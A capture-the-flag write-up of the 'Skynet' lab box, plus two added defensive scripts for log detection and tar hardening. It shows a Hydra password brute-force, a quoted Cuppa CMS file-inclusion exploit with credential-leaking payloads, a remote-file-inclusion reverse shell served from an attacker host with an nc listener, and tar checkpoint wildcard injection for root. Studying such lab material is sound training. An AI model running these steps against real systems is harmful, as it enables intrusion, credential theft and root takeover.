What is Miles password for his emails?
First, nmap.
nmap 10.10.204.224
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-15 08:52 BST
Nmap scan report for ip-10-10-204-224.eu-west-1.compute.internal (10.10.204.224)
Host is up (0.0026s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
MAC Address: 02:B8:09:9A:1E:73 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.76 seconds
Since HTTP is open, check it in the browser.
There was a Skynet logo and a search bar.
Search for hidden directories with gobuster.
gobuster dir -u http://10.10.204.224 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.204.224
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2024/07/15 08:57:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/.htaccess (Status: 403)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2024/07/15 08:57:37 Finished
===============================================================
/admin and /config gave 403 and could not be accessed.
Accessing /squirrelmail showed a SquirrelMail 1.4.23 login screen.
Search for SquirrelMail exploits.
$ searchsploit squirrelmail
------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------- ---------------------------------
SquirrelMail - 'chpasswd' Local Buffer Overflow | linux/local/273.c
SquirrelMail - 'chpasswd' Local Privilege Escala | linux/local/417.c
SquirrelMail 1.2.11 - 'move_messages.php' Arbitr | php/webapps/22791.txt
SquirrelMail 1.2.11 - Multiple Vulnerabilities | php/webapps/22793.txt
SquirrelMail 1.2.11 Administrator Plugin - 'opti | php/webapps/22792.txt
SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site S | php/webapps/21811.txt
SquirrelMail 1.2.x - From Email Header HTML Inje | php/webapps/24167.txt
SquirrelMail 1.2.x - Theme Remote Command Execut | php/webapps/21358.sh
SquirrelMail 1.4.2 Address Add Plugin - 'add.php | php/webapps/26305.txt
Squirrelmail 1.4.x - 'Redirect.php' Local File I | php/webapps/27948.txt
SquirrelMail 1.4.x - Folder Name Cross-Site Scri | php/webapps/24068.txt
SquirrelMail 1.x - Email Header HTML Injection | linux/remote/24160.txt
SquirrelMail 3.1 - Change Passwd Plugin Local Bu | linux/local/1449.c
SquirrelMail < 1.4.22 - Remote Code Execution | linux/remote/41910.sh
SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Ov | php/webapps/43830.txt
SquirrelMail < 1.4.7 - Arbitrary Variable Overwr | php/webapps/43839.txt
SquirrelMail G/PGP Encryption Plugin - 'deleteke | php/webapps/4718.rb
SquirrelMail G/PGP Encryption Plugin 2.0 - Comma | php/webapps/4173.txt
SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - A | php/webapps/30859.txt
SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - M | php/webapps/30283.txt
SquirrelMail PGP Plugin - Command Execution (SMT | linux/remote/16888.rb
SquirrelMail Virtual Keyboard Plugin - 'vkeyboar | php/webapps/34814.txt
------------------------------------------------- ---------------------------------
Shellcodes: No Results
Of these, the following five look usable against version 1.4.23.
Squirrelmail 1.4.x - 'Redirect.php' Local File I | php/webapps/27948.txt
SquirrelMail 1.4.x - Folder Name Cross-Site Scri | php/webapps/24068.txt
SquirrelMail 1.x - Email Header HTML Injection | linux/remote/24160.txt
SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Ov | php/webapps/43830.txt
SquirrelMail < 1.4.7 - Arbitrary Variable Overwr | php/webapps/43839.txt
However, after looking into them, none of them seemed usable.
I got stuck, so I looked at the hint.
Enumerate Samba
Let's enumerate SMB.
$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.242.86
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-16 06:54 BST
Nmap scan report for ip-10-10-242-86.eu-west-1.compute.internal (10.10.242.86)
Host is up (0.00018s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 02:A8:72:B5:28:69 (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.242.86\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.242.86\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.242.86\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.242.86\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
| smb-enum-users:
| SKYNET\milesdyson (RID: 1000)
| Full name:
| Description:
|_ Flags: Normal user account
Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds
Access the anonymous share.
$ smbclient //10.10.242.86/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 08:20:17 2019
attention.txt N 163 Wed Sep 18 04:04:59 2019
logs D 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5831500 blocks available
Under logs there were log1.txt, log2.txt and log3.txt.
log2.txt and log3.txt were empty; log1.txt and attention.txt contained the following.
$ cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
From attention.txt it is clear that log1.txt is a password list.
The question asks for Miles's password, so brute-force it against this list.
$ hydra -l milesdyson -P log1.txt 10.10.242.86 http-form-post "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2024-07-16 07:13:03
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.242.86:80//squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.242.86 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-07-16 07:13:14
cyborg007haloterminator
What is the hidden directory?
Now that we have the username and password, log in to SquirrelMail.
Looking around, one email contained the following.
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
Use this password to access SMB again.
$ smbclient //10.10.242.86/milesdyson --user=milesdyson
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 10:05:47 2019
.. D 0 Wed Sep 18 04:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 10:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 10:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 10:05:14 2019
notes D 0 Tue Sep 17 10:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 10:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 10:05:14 2019
9204224 blocks of size 1024. 5831392 blocks available
There are many PDFs and one folder.
Going through them in order, notes contained important.txt.
$ cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
Item 3 says something important.
That aside, /45kra24zxs28v3yd is probably the hidden directory.
Accessing it got a hit.
/45kra24zxs28v3yd
What is the vulnerability called when you can include a remote file for malicious purposes?
Miles Dyson Personal Page
Dr. Miles Bennett Dyson was the original inventor of the neural-net processor which would lead to the development of Skynet,
a computer A.I. intended to control electronically linked weapons and defend the United States.
So Miles Dyson was the developer of Skynet.
There was no other notable information, so search for hidden directories under it.
$ gobuster dir -u http://10.10.242.86/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.242.86/45kra24zxs28v3yd/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2024/07/16 07:32:58 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2024/07/16 07:32:58 Finished
===============================================================
Accessing /administrator brought up a Cuppa CMS login page.
This time it must be the exploit's turn?!
$ searchsploit cuppa
------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote | php/webapps/25971.txt
------------------------------------------------- ---------------------------------
Shellcodes: No Results
There was only one. Let's look at it.
$ searchsploit -m 25971.txt
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /opt/exploitdb/exploits/php/webapps/25971.txt
Codes: OSVDB-94101
Verified: True
File Type: C++ source, ASCII text, with very long lines
Copied to: /root/25971.txt
$ cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
The vulnerability was remote file inclusion.
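From the defender's side, both steps of this chain (the Hydra run against SquirrelMail's login handler, and the Cuppa CMS urlConfig inclusion) leave distinctive traces in the web server's access log. The following script is an added example, not part of the original writeup or either project; it assumes Apache "combined" log format (client IP in field 1, method in field 6, request path in field 7) and a file-inclusion style parameter named urlConfig. The log lines are constructed for the example, reusing the addresses from this writeup.

```shell
#!/bin/sh
# Added example (not from the original writeup): detection over Apache access-log
# lines for (1) a burst of POSTs to SquirrelMail's login handler from one client
# and (2) urlConfig= values carrying a URL scheme, a php:// wrapper or a ../ traversal.
# Assumes Apache combined log format: $1 client IP, $6 method, $7 request path.

# Constructed sample log lines (not real traffic): seven login POSTs from one
# client within ten seconds, one from another client, and four requests to
# alertConfigField.php, three of which are inclusion attempts.
SAMPLE_LOG='10.10.92.184 - - [16/Jul/2024:07:13:03 +0100] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"
10.10.92.184 - - [16/Jul/2024:07:13:04 +0100] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"
10.10.92.184 - - [16/Jul/2024:07:13:05 +0100] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"
10.10.92.184 - - [16/Jul/2024:07:13:06 +0100] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"
10.10.92.184 - - [16/Jul/2024:07:13:07 +0100] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"
10.10.92.184 - - [16/Jul/2024:07:13:08 +0100] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"
10.10.92.184 - - [16/Jul/2024:07:13:09 +0100] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Hydra)"
10.10.50.5 - - [16/Jul/2024:07:14:00 +0100] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux)"
10.10.92.184 - - [16/Jul/2024:08:01:10 +0100] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.92.184/php-reverse-shell.php HTTP/1.1" 200 3211 "-" "Mozilla/5.0 (X11; Linux)"
10.10.92.184 - - [16/Jul/2024:08:01:11 +0100] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 1480 "-" "Mozilla/5.0 (X11; Linux)"
10.10.92.184 - - [16/Jul/2024:08:01:12 +0100] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2044 "-" "Mozilla/5.0 (X11; Linux)"
10.10.50.5 - - [16/Jul/2024:08:05:00 +0100] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=alerts.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (X11; Linux)"'

# Clients that POSTed to the SquirrelMail login handler more than $1 times.
# Prints "<ip> <count>" for each offending client.
login_burst_sources() {
    printf '%s\n' "$SAMPLE_LOG" | awk -v limit="$1" '
        $6 == "\"POST" && $7 ~ /\/squirrelmail\/src\/redirect\.php/ { hits[$1]++ }
        END { for (ip in hits) if (hits[ip] > limit) print ip, hits[ip] }'
}

# Requests whose urlConfig parameter carries a URL scheme, a php:// or data://
# stream wrapper, or a ../ traversal (plain or percent-encoded).
# Prints "<ip> <request path>" for each match.
inclusion_attempts() {
    printf '%s\n' "$SAMPLE_LOG" | awk '
        $7 ~ /[?&]urlConfig=(https?|ftp|php|data)(:|%3[aA])/ ||
        $7 ~ /[?&]urlConfig=[^&]*(\.\.\/|\.\.%2[fF])/ { print $1, $7 }'
}

echo "Clients with more than 5 login POSTs:"
login_burst_sources 5
echo "File-inclusion attempts against urlConfig:"
inclusion_attempts
```

On a real server, replace the printf of SAMPLE_LOG with a read of the access log; the threshold for login_burst_sources should be tuned per time window (Hydra's default 16 parallel tasks produce far more than seven POSTs per second), and the urlConfig pattern generalises to any include-style parameter name by editing the regex.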
remote file inclusion
What is the user flag?
Use the vulnerability to get a reverse shell.
$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Get php-reverse-shell.
You can also generate one with a reverse-shell generator, specifying the attacking machine's IP and port.
In php-reverse-shell.php, set the IP to the attacking machine's local IP and the port to any port you like.
Start a web server in the directory where php-reverse-shell.php is saved.
$ python3 -m http.server 80
Listen on the attacking machine.
$ nc -lvnp 5555
Access the following link in the browser.
http://10.10.51.86/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.92.184/php-reverse-shell.php
Got a reverse shell.
user.txt was there.
What is the root flag?
sudo -l did not look usable.
Check the crontab.
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
Looking at backup.sh, it backs up everything under /var/www/html/.
A wildcard is used.
$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
When a wildcard is used like this, files with names such as --checkpoint=1 or --checkpoint-action=exec=sh shell.sh are apparently treated as options by tar.
Reference:
$ touch "--checkpoint=1"
$ touch "--checkpoint-action=exec=sh shell.sh"
Also create shell.sh and write into it a command that changes the permissions of the /root folder.
$ chmod 777 shell.sh
One minute later, the root folder becomes readable.
root.txt was there.
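The root cause above is that the shell expands * into tar's argument list, so any file in the web root whose name begins with "-" is parsed as an option. As an added example (not the room's backup.sh and not from the original writeup), the script below shows the hardened form a defender would want: archive the directory itself with -C and a literal ".", so no glob ever reaches tar, together with a pre-check that reports option-looking names. It assumes GNU or busybox tar and POSIX sh; the scratch directory and file names are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original writeup): a backup script hardened against
# the wildcard-as-option problem, plus a check that reports option-looking names.
# The original ran: cd /var/www/html && tar cf /home/milesdyson/backups/backup.tgz *

# Print every entry directly under $1 whose name begins with "-", i.e. a name
# that a bare * would hand to tar as an option. Returns 0 if any were found.
option_like_names() {
    dir="$1"
    found=1
    for entry in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$entry" ] || continue      # unmatched glob stays literal; skip it
        name=${entry##*/}
        case "$name" in
            -*) echo "$name"; found=0 ;;
        esac
    done
    return "$found"
}

# Hardened backup: tar receives exactly one path operand, ".", relative to the
# source directory given with -C. Nothing inside the web root can become an
# argument, so --checkpoint=1 or --checkpoint-action=... files are archived as
# ordinary members (listed as ./--checkpoint=1) instead of being interpreted.
safe_backup() {
    src="$1"
    dest="$2"
    tar -cf "$dest" -C "$src" .
}

# Demo on a scratch directory that contains a file named like a tar option.
demo_dir=$(mktemp -d)
touch "$demo_dir/index.html" "$demo_dir/--checkpoint=1"
if option_like_names "$demo_dir" >/dev/null; then
    echo "warning: option-like file names present in $demo_dir"
fi
safe_backup "$demo_dir" "$demo_dir.tar"
echo "archive members:"
tar -tf "$demo_dir.tar"
rm -rf "$demo_dir" "$demo_dir.tar"
```

If the original glob form has to be kept for some reason, GNU tar also stops option parsing at "--" (tar cf backup.tgz -- *), but the -C form is portable across tar implementations and removes the glob entirely, which is the better fix for a root cron job.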